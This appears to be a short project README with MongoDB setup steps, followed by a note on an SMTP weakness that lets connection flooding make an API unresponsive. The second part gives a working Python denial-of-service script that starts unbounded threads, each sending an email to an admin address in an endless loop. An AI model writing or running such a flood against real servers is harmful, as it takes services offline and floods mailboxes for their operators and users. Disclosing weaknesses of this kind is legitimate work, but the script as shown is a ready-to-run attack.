- Firstly create a mongodb account, and proceed to create a new project.
- Now create a new database.
- Now goto the database overview and goto the collections tab.
- Now create a new database / collection.
- Now edit the following files and put your connection url inside.
- All you have to do now is run main.py on your vps.
- Open your domain management
- SMTP Connections, Spamming smtp connections and attempting to send an email will result in the api not responding until you stop trying to connect/send.
import smtplib import threading def send(): message = """From: dropout <[email protected]> To: admin <[email protected]> Subject: SMTP Vuln Naughty, Naughty vuln """ try: smtp = smtplib.SMTP("stmp.server.com") smtp.sendmail("[email protected]", "[email protected]", message) except Exception: pass if __name__ == "__main__": while True: threading.Thread(target=send).start()
View my contact information on my website